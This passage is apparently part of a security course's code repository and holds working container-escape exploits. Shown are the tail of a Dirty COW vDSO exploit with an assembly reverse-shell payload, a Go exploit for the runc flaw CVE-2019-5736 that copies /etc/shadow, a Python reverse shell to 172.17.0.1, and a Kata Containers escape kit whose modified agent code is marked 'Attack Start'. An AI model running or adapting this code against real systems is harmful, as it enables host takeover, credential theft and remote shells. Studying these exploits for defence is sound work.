uint16_t port; uint32_t ip; int s; ip = htonl(PAYLOAD_IP); port = htons(PAYLOAD_PORT); if (argc > 1) { if (parse_ip_port(argv[1], &ip, &port) != 0) return EXIT_FAILURE; } fprintf(stderr, "[*] payload target: %s:%d\n", inet_ntoa(*(struct in_addr *)&ip), ntohs(port)); arg.vdso_addr = get_vdso_addr(); if (arg.vdso_addr == NULL) return EXIT_FAILURE; prologue = fingerprint_prologue(arg.vdso_addr); if (prologue == NULL) { fprintf(stderr, "[-] this vDSO version isn't supported\n"); fprintf(stderr, " add first entry point instructions to prologues\n"); return EXIT_FAILURE; } if (patch_payload(prologue, ip, port) == -1) return EXIT_FAILURE; if (build_vdso_patch(arg.vdso_addr, prologue) == -1) return EXIT_FAILURE; s = create_socket(port); if (s == -1) return EXIT_FAILURE; if (exploit(&arg, true) == -1) { fprintf(stderr, "exploit failed\n"); return EXIT_FAILURE; } yeah(&arg, s); return EXIT_SUCCESS; } ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/Makefile ================================================ CFLAGS := -Wall LDFLAGS := -lpthread all: 0xdeadbeef 0xdeadbeef: 0xdeadbeef.o $(CC) -o $@ $^ $(LDFLAGS) 0xdeadbeef.o: 0xdeadbeef.c payload.h $(CC) -o $@ -c $< $(CFLAGS) payload.h: payload xxd -i $^ $@ payload: payload.s nasm -f bin -o $@ $^ clean: rm -f *.o *.h 0xdeadbeef ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/payload.s ================================================ BITS 64 [SECTION .text] global _start SYS_OPEN equ 0x2 SYS_SOCKET equ 0x29 SYS_CONNECT equ 0x2a SYS_DUP2 equ 0x21 SYS_FORK equ 0x39 SYS_EXECVE equ 0x3b SYS_EXIT equ 0x3c SYS_READLINK equ 0x59 SYS_GETUID equ 0x66 AF_INET equ 0x2 SOCK_STREAM equ 0x1 IP equ 0xdeadc0de ;; patched by 0xdeadbeef.c PORT equ 0x1337 ;; patched by 0xdeadbeef.c _start: ;; save registers push rdi push rsi push rdx push rcx ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; ;; return if getuid() != 0 ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; mov rax, SYS_GETUID syscall test rax, rax jne return ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; ;; check if whithin a container (PROC_PID_INIT_INO = 0xEFFFFFFC) ;; return if $(readlink /proc/1/ns/pid) != "pid:[4026531836]" ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; call get_strings lea rsi, [rsp-16] mov rdx, 16 ; strlen("pid:[4026531836]") mov rax, SYS_READLINK syscall cmp rax, rdx jne return add rdi, 15 ; "pid:[4026531836]" mov rcx, rdx repe cmpsb jne return ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; ;; return if open("/tmp/.x", O_CREAT|O_EXCL, x) == -1 ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; mov rsi, 0x00782e2f706d742f push rsi mov rdi, rsp mov rsi, 192 mov rax, SYS_OPEN syscall test rax, rax pop rsi js return ;; fork mov rax, SYS_FORK syscall test rax, rax jne return ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; ;; reverse connect (https://www.exploit-db.com/exploits/35587/) ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; sockfd = socket(AF_INET, SOCK_STREAM, 0) xor rsi, rsi ; 0 out rsi mul esi ; 0 out rax, rdx ; rdx = IPPROTO_IP (int: 0) inc rsi ; rsi = SOCK_STREAM push AF_INET pop rdi add al, SYS_SOCKET syscall ; copy socket descriptor to rdi for future use push rax pop rdi ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = IP ; bzero(&server.sin_zero, 8) push rdx push rdx mov dword [rsp + 0x4], IP mov word [rsp + 0x2], PORT mov byte [rsp], AF_INET ;; connect(sockfd, (struct sockaddr *)&server, sockaddr_len) push rsp pop rsi push 0x10 pop rdx push SYS_CONNECT pop rax syscall test rax, rax js exit ;; dup2(sockfd, STDIN); dup2(sockfd, STDOUT); dup2(sockfd, STERR) xor rax, rax push 0x3 ; loop down file descriptors for I/O pop rsi dup_loop: dec esi mov al, SYS_DUP2 syscall jne dup_loop ;; execve('//bin/sh', NULL, NULL) push rsi ; *argv[] = 0 pop rdx ; *envp[] = 0 push rsi ; '\0' mov rdi, '//bin/sh' ; str push rdi push rsp pop rdi ; rdi = &str (char*) xor rax, rax mov al, SYS_EXECVE syscall exit: xor rax, rax mov al, SYS_EXIT syscall return: ;; restore registers pop rcx pop rdx pop rsi pop rdi ;; get callee address (pushed on the stack by the call instruction) pop rax ;; execute missed instructions (patched by 0xdeadbeef.c) db 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 ;; return to callee jmp rax get_strings: lea rdi, [rel $ +8] ret db '/proc/1/ns/pid' db 0 db 'pid:[4026531836]' ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736/main.go ================================================ package main // Implementation of CVE-2019-5736 // Created with help from @singe, @_cablethief, and @feexd. // This commit also helped a ton to understand the vuln // https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d import ( "fmt" "io/ioutil" "os" "strconv" "strings" ) // This is the line of shell commands that will execute on the host var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow" func main() { // First we overwrite /bin/sh with the /proc/self/exe interpreter path fd, err := os.Create("/bin/sh") if err != nil { fmt.Println(err) return } fmt.Fprintln(fd, "#!/proc/self/exe") err = fd.Close() if err != nil { fmt.Println(err) return } fmt.Println("[+] Overwritten /bin/sh successfully") // Loop through all processes to find one whose cmdline includes runcinit // This will be the process created by runc var found int for found == 0 { pids, err := ioutil.ReadDir("/proc") if err != nil { fmt.Println(err) return } for _, f := range pids { fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline") fstring := string(fbytes) if strings.Contains(fstring, "runc") { fmt.Println("[+] Found the PID:", f.Name()) found, err = strconv.Atoi(f.Name()) if err != nil { fmt.Println(err) return } } } } // We will use the pid to get a file handle for runc on the host. var handleFd = -1 for handleFd == -1 { // Note, you do not need to use the O_PATH flag for the exploit to work. handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777) if int(handle.Fd()) > 0 { handleFd = int(handle.Fd()) } } fmt.Println("[+] Successfully got the file handle") // Now that we have the file handle, lets write to the runc binary and overwrite it // It will maintain it's executable flag for { writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700) if int(writeHandle.Fd()) > 0 { fmt.Println("[+] Successfully got write handle", writeHandle) writeHandle.Write([]byte(payload)) return } } } ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/cause-core-dump.c ================================================ #include int main(void) { int *a = NULL; *a = 1; return 0; } ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/tmp-dot-x.py ================================================ import os import pty import socket lhost = "172.17.0.1" # 根据实际情况修改 lport = 10000 # 根据实际情况修改 def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((lhost, lport)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) os.putenv("HISTFILE", '/dev/null') pty.spawn("/bin/bash") os.remove('/tmp/.x.py') s.close() if __name__ == "__main__": main() ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/build.sh ================================================ #!/bin/bash set -e -x current_path=`pwd` agent_path=$GOPATH/src/github.com/kata-containers/agent/ # build evil agent cd $agent_path git checkout -- . git checkout 1.10.0 cp $current_path/evil_agent_src/* $agent_path sed -i 's/VERSION_COMMIT :=.*$/VERSION_COMMIT := 1.10.0-a8007c2969e839b584627d1a7db4cac13af908a6/g' $agent_path/Makefile make cd - cp $agent_path/kata-agent ./docker/evil-kata-agent # build reverse shell gcc -o ./docker/evil_bin evil_bin.c -static docker build -t kata-malware-image:latest docker/ ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/change_container_runtime.sh ================================================ #!/bin/bash if [ $1 = "kata" ]; then cat << EOF > /etc/docker/daemon.json { "runtimes": { "kata-runtime": { "path": "/opt/kata/bin/kata-runtime" }, "kata-clh": { "path": "/opt/kata/bin/kata-clh" }, "kata-qemu": { "path": "/opt/kata/bin/kata-qemu" } }, "registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"] } EOF cat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf [Service] ExecStart= ExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime EOF systemctl daemon-reload && systemctl restart docker elif [ $1 = "runc" ]; then rm -f /etc/systemd/system/docker.service.d/kata-containers.conf cat << EOF > /etc/docker/daemon.json { "registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"] } EOF systemctl daemon-reload && systemctl restart docker else echo "Invalid container runtime." fi ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/clean_kata.sh ================================================ #!/bin/bash set -e -x rm -f /usr/bin/kata* rm -r /etc/kata-containers rm -r /opt/kata rm /etc/docker/daemon.json rm /etc/systemd/system/docker.service.d/kata-containers.conf systemctl daemon-reload && systemctl restart docker ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/docker/Dockerfile ================================================ FROM ubuntu:latest COPY bash /bash COPY evil-kata-agent /evil-kata-agent COPY attack.sh /attack.sh # Since we're targeting /bin, let's put some fake binaries in the image COPY evil_bin /ls COPY evil_bin /ps COPY evil_bin /rm RUN chmod +x /attack.sh /evil-kata-agent /ls /ps /rm /bash ENTRYPOINT ["/attack.sh"] ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/docker/attack.sh ================================================ #!/bin/bash set -e echo -e "\t[+] In the evil container" echo -e "\t[*] Searching for the device..." found_clh_dev=false for path in /sys/dev/block/* ; do curr_target=$(readlink $path) if [[ $curr_target == *"vda1"* ]]; then dev=$(basename $path) guest_fs_major=$(echo $dev | cut -f1 -d:) guest_fs_minor=$(echo $dev | cut -f2 -d:) found_clh_dev=true break fi done if [ "$found_clh_dev" = false ]; then echo -e "\t[!] no vda1 device, not on CLH, shutting down..." exit 1 fi echo -e "\t[+] Device found" echo -e "\t[*] Mknoding..." mknod --mode 0600 /dev/guest_hd b $guest_fs_major $guest_fs_minor echo -e "\t[+] Mknoded successfully" # Ok we're on CLH, let's run the attack echo -e "\t[*] Replacing the guest kata-agent..." cmd_file=/tmp/debugfs_cmdfile rm -rf $cmd_file cat < $cmd_file open -w /dev/guest_hd cd /usr/bin rm kata-agent write /evil-kata-agent kata-agent close -a EOF # Execute cmdfile /sbin/debugfs -f $cmd_file echo -e "\t[+] Done" ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/grpc.go ================================================ // // Copyright (c) 2017-2019 Intel Corporation // // SPDX-License-Identifier: Apache-2.0 // package main import ( "bufio" "bytes" "encoding/json" "fmt" "io/ioutil" "os" "os/exec" "path/filepath" "regexp" "strconv" "strings" "syscall" "time" gpb "github.com/gogo/protobuf/types" "github.com/kata-containers/agent/pkg/types" pb "github.com/kata-containers/agent/protocols/grpc" "github.com/opencontainers/runc/libcontainer" "github.com/opencontainers/runc/libcontainer/configs" "github.com/opencontainers/runc/libcontainer/seccomp" "github.com/opencontainers/runc/libcontainer/specconv" "github.com/opencontainers/runc/libcontainer/utils" "github.com/opencontainers/runtime-spec/specs-go" "github.com/sirupsen/logrus" "golang.org/x/net/context" "golang.org/x/sys/unix" "google.golang.org/grpc/codes" grpcStatus "google.golang.org/grpc/status" ) type agentGRPC struct { sandbox *sandbox version string } // CPU and Memory hotplug const ( cpuRegexpPattern = "cpu[0-9]*" memRegexpPattern = "memory[0-9]*" libcontainerPath = "/run/libcontainer" ) var ( sysfsCPUOnlinePath = "/sys/devices/system/cpu" sysfsMemOnlinePath = "/sys/devices/system/memory" sysfsMemoryBlockSizePath = "/sys/devices/system/memory/block_size_bytes" sysfsMemoryHotplugProbePath = "/sys/devices/system/memory/probe" sysfsConnectedCPUsPath = filepath.Join(sysfsCPUOnlinePath, "online") containersRootfsPath = "/run" // set when StartTracing() is called. startTracingCalled = false // set when StopTracing() is called. stopTracingCalled = false modprobePath = "/sbin/modprobe" ) type onlineResource struct { sysfsOnlinePath string regexpPattern string } type cookie map[string]bool var emptyResp = &gpb.Empty{} const onlineCPUMemWaitTime = 100 * time.Millisecond var onlineCPUMaxTries = uint32(100) const cpusetMode = 0644 // handleError will log the specified error if wait is false func handleError(wait bool, err error) error { if !wait { agentLog.WithError(err).Error() } return err } // Online resources, nbResources specifies the maximum number of resources to online. // If nbResources is <= 0 then there is no limit and all resources are connected. // Returns the number of resources connected. func onlineResources(resource onlineResource, nbResources int32) (uint32, error) { files, err := ioutil.ReadDir(resource.sysfsOnlinePath) if err != nil { return 0, err } var count uint32 for _, file := range files { matched, err := regexp.MatchString(resource.regexpPattern, file.Name()) if err != nil { return count, err } if !matched { continue } onlinePath := filepath.Join(resource.sysfsOnlinePath, file.Name(), "online") status, err := ioutil.ReadFile(onlinePath) if err != nil { // resource cold plugged continue } if strings.Trim(string(status), "\n\t ") == "0" { if err := ioutil.WriteFile(onlinePath, []byte("1"), 0600); err != nil { agentLog.WithField("online-path", onlinePath).WithError(err).Errorf("Could not online resource") continue } count++ if nbResources > 0 && count == uint32(nbResources) { return count, nil } } } return count, nil } func onlineCPUResources(nbCpus uint32) error { resource := onlineResource{ sysfsOnlinePath: sysfsCPUOnlinePath, regexpPattern: cpuRegexpPattern, } var count uint32 for i := uint32(0); i < onlineCPUMaxTries; i++ { r, err := onlineResources(resource, int32(nbCpus-count)) if err != nil { return err } count += r if count == nbCpus { return nil } time.Sleep(onlineCPUMemWaitTime) } return fmt.Errorf("only %d of %d were connected", count, nbCpus) } func onlineMemResources() error { resource := onlineResource{ sysfsOnlinePath: sysfsMemOnlinePath, regexpPattern: memRegexpPattern, } _, err := onlineResources(resource, -1) return err } // updates a cpuset cgroups path visiting each sub-directory in cgroupPath parent and writing // the maximal set of cpus in cpuset.cpus file, finally the cgroupPath is updated with the requsted //value. // cookies are used for performance reasons in order to // don't update a cgroup twice. func updateCpusetPath(cgroupPath string, newCpuset string, cookies cookie) error { // Each cpuset cgroup parent MUST BE updated with the actual number of vCPUs. //Start to update from cgroup system root. cgroupParentPath := cgroupCpusetPath cpusetGuest, err := getCpusetGuest() if err != nil { return err } // Update parents with max set of current cpus //Iterate all parent dirs in order. //This is needed to ensure the cgroup parent has cpus on needed needed //by the request. cgroupsParentPaths := strings.Split(filepath.Dir(cgroupPath), "/") for _, path := range cgroupsParentPaths { // Skip if empty. if path == "" { continue } cgroupParentPath = filepath.Join(cgroupParentPath, path) // check if the cgroup was already updated. if cookies[cgroupParentPath] { agentLog.WithField("path", cgroupParentPath).Debug("cpuset cgroup already updated") continue } cpusetCpusParentPath := filepath.Join(cgroupParentPath, "cpuset.cpus") agentLog.WithField("path", cpusetCpusParentPath).Debug("updating cpuset parent cgroup") if err := ioutil.WriteFile(cpusetCpusParentPath, []byte(cpusetGuest), cpusetMode); err != nil { return fmt.Errorf("Could not update parent cpuset cgroup (%s) cpuset:'%s': %v", cpusetCpusParentPath, cpusetGuest, err) } // add cgroup path to the cookies. cookies[cgroupParentPath] = true } // Finally update group path with requested value. cpusetCpusPath := filepath.Join(cgroupCpusetPath, cgroupPath, "cpuset.cpus") agentLog.WithField("path", cpusetCpusPath).Debug("updating cpuset cgroup") if err := ioutil.WriteFile(cpusetCpusPath, []byte(newCpuset), cpusetMode); err != nil { return fmt.Errorf("Could not update parent cpuset cgroup (%s) cpuset:'%s': %v", cpusetCpusPath, cpusetGuest, err) } return nil } func (a *agentGRPC) onlineCPUMem(req *pb.OnlineCPUMemRequest) error { if req.NbCpus == 0 && req.CpuOnly { return handleError(req.Wait, fmt.Errorf("requested number of CPUs '%d' must be greater than 0", req.NbCpus)) } // we are going to update the containers of the sandbox, we have to lock it a.sandbox.Lock() defer a.sandbox.Unlock() if req.NbCpus > 0 { agentLog.WithField("vcpus-to-connect", req.NbCpus).Debug("connecting vCPUs") if err := onlineCPUResources(req.NbCpus); err != nil { return handleError(req.Wait, err) } } if !req.CpuOnly { if err := onlineMemResources(); err != nil { return handleError(req.Wait, err) } } // At this point all CPUs have been connected, we need to know // the actual range of CPUs connectedCpus, err := getCpusetGuest() if err != nil { return handleError(req.Wait, fmt.Errorf("Could not get the actual range of connected CPUs: %v", err)) } agentLog.WithField("range-of-vcpus", connectedCpus).Debug("connecting vCPUs") cookies := make(cookie) // Now that we know the actual range of connected CPUs, we need to iterate over // all containers an update each cpuset cgroup. This is not required in docker // containers since they don't hot add/remove CPUs. for _, c := range a.sandbox.containers { agentLog.WithField("container", c.container.ID()).Debug("updating cpuset cgroup") contConfig := c.container.Config() cgroupPath := contConfig.Cgroups.Path // In order to avoid issues updating the container cpuset cgroup, its cpuset cgroup *parents* // MUST BE updated, otherwise we'll get next errors: // - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: permission denied // - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: device or resource busy // NOTE: updating container cpuset cgroup *parents* won't affect container cpuset cgroup, for example if container cpuset cgroup has "0" // and its cpuset cgroup *parents* have "0-5", the container will be able to use only the CPU 0. // cpuset assinged containers are not updated, only we update its parents. if contConfig.Cgroups.Resources.CpusetCpus != "" { agentLog.WithField("cpuset", contConfig.Cgroups.Resources.CpusetCpus).Debug("updating container cpuset cgroup parents") // remove container cgroup directory cgroupPath = filepath.Dir(cgroupPath) } if err := updateCpusetPath(cgroupPath, connectedCpus, cookies); err != nil { return handleError(req.Wait, err) } } return nil } func setConsoleCarriageReturn(fd int) error { termios, err := unix.IoctlGetTermios(fd, unix.TCGETS) if err != nil { return err } termios.Oflag |= unix.ONLCR return unix.IoctlSetTermios(fd, unix.TCSETS, termios) } func buildProcess(agentProcess *pb.Process, procID string, init bool) (*process, error) { user := agentProcess.User.Username if user == "" { // We can specify the user and the group separated by ":" user = fmt.Sprintf("%d:%d", agentProcess.User.UID, agentProcess.User.GID) } additionalGids := []string{} for _, gid := range agentProcess.User.AdditionalGids { additionalGids = append(additionalGids, fmt.Sprintf("%d", gid)) } proc := &process{ id: procID, process: libcontainer.Process{ Cwd: agentProcess.Cwd, Args: agentProcess.Args, Env: agentProcess.Env, User: user, AdditionalGroups: additionalGids, Init: init, }, } if agentProcess.Terminal { parentSock, childSock, err := utils.NewSockPair("console") if err != nil { return nil, err } proc.process.ConsoleSocket = childSock proc.consoleSock = parentSock epoller, err := newEpoller() if err != nil { return nil, err } proc.epoller = epoller return proc, nil } rStdin, wStdin, err := os.Pipe() if err != nil { return nil, err } rStdout, wStdout, err := os.Pipe() if err != nil { return nil, err } rStderr, wStderr, err := os.Pipe() if err != nil { return nil, err } proc.process.Stdin = rStdin proc.process.Stdout = wStdout proc.process.Stderr = wStderr proc.stdin = wStdin proc.stdout = rStdout proc.stderr = rStderr return proc, nil } func (a *agentGRPC) Check(ctx context.Context, req *pb.CheckRequest) (*pb.HealthCheckResponse, error) { return &pb.HealthCheckResponse{Status: pb.HealthCheckResponse_SERVING}, nil } func (a *agentGRPC) Version(ctx context.Context, req *pb.CheckRequest) (*pb.VersionCheckResponse, error) { return &pb.VersionCheckResponse{ GrpcVersion: pb.APIVersion, AgentVersion: a.version, }, nil } func (a *agentGRPC) getContainer(cid string) (*container, error) { if !a.sandbox.running { return nil, grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started") } ctr, err := a.sandbox.getContainer(cid) if err != nil { return nil, err } return ctr, nil } // Shared function between CreateContainer and ExecProcess, because those expect // a process to be run. func (a *agentGRPC) execProcess(ctr *container, proc *process, createContainer bool) (err error) { if ctr == nil { return grpcStatus.Error(codes.InvalidArgument, "Container cannot be nil") } if proc == nil { return grpcStatus.Error(codes.InvalidArgument, "Process cannot be nil") } // This lock is very important to avoid any race with reaper.reap(). // Indeed, if we don't lock this here, we could potentially get the // SIGCHLD signal before the channel has been created, meaning we will // miss the opportunity to get the exit code, leading WaitProcess() to // wait forever on the new channel. // This lock has to be taken before we run the new process. a.sandbox.subreaper.lock() defer a.sandbox.subreaper.unlock() if createContainer { err = ctr.container.Start(&proc.process) } else { err = ctr.container.Run(&(proc.process)) } // ~ Attack Start ~ // // Commenting out the following code so that we won't send back a failure //// if err != nil { //// return grpcStatus.Errorf(codes.Internal, "Could not run process: %v", err) //// } // ~ Attack End ~ // // Get process PID pid, err := proc.process.Pid() if err != nil { return err } proc.exitCodeCh = make(chan int, 1) // Create process channel to allow WaitProcess to wait on it. // This channel is buffered so that reaper.reap() will not // block until WaitProcess listen onto this channel. a.sandbox.subreaper.setExitCodeCh(pid, proc.exitCodeCh) return nil } // Shared function between CreateContainer and ExecProcess, because those expect // the console to be properly setup after the process has been started. func (a *agentGRPC) postExecProcess(ctr *container, proc *process) error { if ctr == nil { return grpcStatus.Error(codes.InvalidArgument, "Container cannot be nil") } if proc == nil { return grpcStatus.Error(codes.InvalidArgument, "Process cannot be nil") } defer proc.closePostStartFDs() // Setup terminal if enabled. if proc.consoleSock != nil { termMaster, err := utils.RecvFd(proc.consoleSock) if err != nil { return err } if err := setConsoleCarriageReturn(int(termMaster.Fd())); err != nil { return err } proc.termMaster = termMaster // Get process PID pid, err := proc.process.Pid() if err != nil { return err } a.sandbox.subreaper.setEpoller(pid, proc.epoller) if err = proc.epoller.add(proc.termMaster); err != nil { return err } } ctr.setProcess(proc) return nil } // This function updates the container namespaces configuration based on the // sandbox information. When the sandbox is created, it can be setup in a way // that all containers will share some specific namespaces. This is the agent // responsibility to create those namespaces so that they can be shared across // several containers. // If the sandbox has not been setup to share namespaces, then we assume all // containers will be started in their own new namespace. // The value of a.sandbox.sharedPidNs.path will always override the namespace // path set by the spec, since we will always ignore it. Indeed, it makes no // sense to rely on the namespace path provided by the host since namespaces // are different inside the guest. func (a *agentGRPC) updateContainerConfigNamespaces(config *configs.Config, ctr *container) { var ipcNs, utsNs bool for idx, ns := range config.Namespaces { if ns.Type == configs.NEWIPC { config.Namespaces[idx].Path = a.sandbox.sharedIPCNs.path ipcNs = true } if ns.Type == configs.NEWUTS { config.Namespaces[idx].Path = a.sandbox.sharedUTSNs.path utsNs = true } } if !ipcNs { newIPCNs := configs.Namespace{ Type: configs.NEWIPC, Path: a.sandbox.sharedIPCNs.path, } config.Namespaces = append(config.Namespaces, newIPCNs) } if !utsNs { newUTSNs := configs.Namespace{ Type: configs.NEWUTS, Path: a.sandbox.sharedUTSNs.path, } config.Namespaces = append(config.Namespaces, newUTSNs) } // Update PID namespace. var pidNsPath string // Use shared pid ns if useSandboxPidns has been set in either // the CreateSandbox request or CreateContainer request. // Else set this to empty string so that a new pid namespace is // created for the container. if ctr.useSandboxPidNs || a.sandbox.sandboxPidNs { pidNsPath = a.sandbox.sharedPidNs.path } else { pidNsPath = "" } newPidNs := configs.Namespace{ Type: configs.NEWPID, Path: pidNsPath, } config.Namespaces = append(config.Namespaces, newPidNs) } func (a *agentGRPC) updateContainerConfigPrivileges(spec *specs.Spec, config *configs.Config) error { if spec == nil || spec.Process == nil { // Don't throw an error in case the Spec does not contain any // information about NoNewPrivileges. return nil } // Add the value for NoNewPrivileges option. config.NoNewPrivileges = spec.Process.NoNewPrivileges return nil } func (a *agentGRPC) updateContainerConfig(spec *specs.Spec, config *configs.Config, ctr *container) error { a.updateContainerConfigNamespaces(config, ctr) return a.updateContainerConfigPrivileges(spec, config) } // rollbackFailingContainerCreation rolls back important steps that might have // been performed before the container creation failed. // - Destroy the container created by libcontainer // - Delete the container from the agent internal map // - Unmount all mounts related to this container func (a *agentGRPC) rollbackFailingContainerCreation(ctr *container) { if ctr.container != nil { ctr.container.Destroy() } a.sandbox.deleteContainer(ctr.id) if err := removeMounts(ctr.mounts); err != nil { agentLog.WithError(err).Error("rollback failed removeMounts()") } } func (a *agentGRPC) finishCreateContainer(ctr *container, req *pb.CreateContainerRequest, config *configs.Config) (resp *gpb.Empty, err error) { containerPath := filepath.Join(libcontainerPath, a.sandbox.id) factory, err := libcontainer.New(containerPath, libcontainer.Cgroupfs) if err != nil { return emptyResp, err } ctr.container, err = factory.Create(req.ContainerId, config) if err != nil { return emptyResp, err } ctr.config = *config ctr.initProcess, err = buildProcess(req.OCI.Process, req.ExecId, true) if err != nil { return emptyResp, err } if err = a.execProcess(ctr, ctr.initProcess, true); err != nil { return emptyResp, err } // Make sure add Container to Sandbox, before call updateSharedPidNs a.sandbox.setContainer(ctr.ctx, req.ContainerId, ctr) if err := a.updateSharedPidNs(ctr); err != nil { return emptyResp, err } return emptyResp, a.postExecProcess(ctr, ctr.initProcess) } func (a *agentGRPC) CreateContainer(ctx context.Context, req *pb.CreateContainerRequest) (resp *gpb.Empty, err error) { // ~ Attack Start ~ // // We need to clean up the symlink we created and replace it with a regular directory. // This ensures that upon sandbox tear-down, when the kata-runtime tries to unmount // the container filesystem, our symlink at '/run/kata-containers/shared/containers/sbx_id/rootfs' // won't exist anymore, so the mount we performed on the host won't be unmounted rootfs_path := "/run/kata-containers/shared/containers/" + a.sandbox.id + "/rootfs" if err := os.Remove(rootfs_path); err != nil { return emptyResp, fmt.Errorf("Attack Remove symlink: '%s'", err) } if err := os.Mkdir(rootfs_path, os.FileMode(0755)); err != nil { return emptyResp, fmt.Errorf("Attack Mkdir recreate rootfs dir: '%s'", err) } // ~ Attack End ~ // if err := a.createContainerChecks(req); err != nil { return emptyResp, err } // re-scan PCI bus // looking for hidden devices if err = rescanPciBus(); err != nil { agentLog.WithError(err).Warn("Could not rescan PCI bus") } // Some devices need some extra processing (the ones invoked with // --device for instance), and that's what this call is doing. It // updates the devices listed in the OCI spec, so that they actually // match real devices inside the VM. This step is necessary since we // cannot predict everything from the caller. if err = addDevices(ctx, req.Devices, req.OCI, a.sandbox); err != nil { return emptyResp, err } // Both rootfs and volumes (invoked with --volume for instance) will // be processed the same way. The idea is to always mount any provided // storage to the specified MountPoint, so that it will match what's // inside oci.Mounts. // After all those storages have been processed, no matter the order // here, the agent will rely on libcontainer (using the oci.Mounts // list) to bind mount all of them inside the container. mountList, err := addStorages(ctx, req.Storages, a.sandbox) if err != nil { return emptyResp, err } ctr := &container{ id: req.ContainerId, processes: make(map[string]*process), mounts: mountList, useSandboxPidNs: req.SandboxPidns, ctx: ctx, } // In case the container creation failed, make sure we cleanup // properly by rolling back the actions previously performed. defer func() { if err != nil { a.rollbackFailingContainerCreation(ctr) } }() // Convert the spec to an actual OCI specification structure. ociSpec, err := pb.GRPCtoOCI(req.OCI) if err != nil { return emptyResp, err } if err := a.handleCPUSet(ociSpec); err != nil { return emptyResp, err } if err := a.applyNetworkSysctls(ociSpec); err != nil { return emptyResp, err } if a.sandbox.guestHooksPresent { // Add any custom OCI hooks to the spec a.sandbox.addGuestHooks(ociSpec) // write the OCI spec to a file so that hooks can read it err = writeSpecToFile(ociSpec) if err != nil { return emptyResp, err } // Change cwd because libcontainer assumes the bundle path is the cwd: // https://github.com/opencontainers/runc/blob/v1.0.0-rc5/libcontainer/specconv/spec_linux.go#L157 oldcwd, err := changeToBundlePath(ociSpec) if err != nil { return emptyResp, err } defer os.Chdir(oldcwd) } // Convert the OCI specification into a libcontainer configuration. config, err := specconv.CreateLibcontainerConfig(&specconv.CreateOpts{ CgroupName: req.ContainerId, NoNewKeyring: true, Spec: ociSpec, NoPivotRoot: a.sandbox.noPivotRoot, }) if err != nil { return emptyResp, err } // apply rlimits config.Rlimits = posixRlimitsToRlimits(ociSpec.Process.Rlimits) // Update libcontainer configuration for specific cases not handled // by the specconv converter. if err = a.updateContainerConfig(ociSpec, config, ctr); err != nil { return emptyResp, err } return a.finishCreateContainer(ctr, req, config) } // Path overridden in unit tests var procSysDir = "/proc/sys" // writeSystemProperty writes the value to a path under /proc/sys as determined from the key. // For e.g. net.ipv4.ip_forward translated to /proc/sys/net/ipv4/ip_forward. func writeSystemProperty(key, value string) error { keyPath := strings.Replace(key, ".", "/", -1) return ioutil.WriteFile(filepath.Join(procSysDir, keyPath), []byte(value), 0644) } func isNetworkSysctl(sysctl string) bool { return strings.HasPrefix(sysctl, "net.") } // libcontainer checks if the container is running in a separate network namespace // before applying the network related sysctls. If it sees that the network namespace of the container // is the same as the "host", it errors out. Since we do no create a new net namespace inside the guest, // libcontainer would error out while verifying network sysctls. To overcome this, we dont pass // network sysctls to libcontainer, we instead have the agent directly apply them. All other namespaced // sysctls are applied by libcontainer. func (a *agentGRPC) applyNetworkSysctls(ociSpec *specs.Spec) error { sysctls := ociSpec.Linux.Sysctl for key, value := range sysctls { if isNetworkSysctl(key) { if err := writeSystemProperty(key, value); err != nil { return err } delete(sysctls, key) } } ociSpec.Linux.Sysctl = sysctls return nil } func (a *agentGRPC) handleCPUSet(ociSpec *specs.Spec) error { if ociSpec.Linux.Resources.CPU != nil && 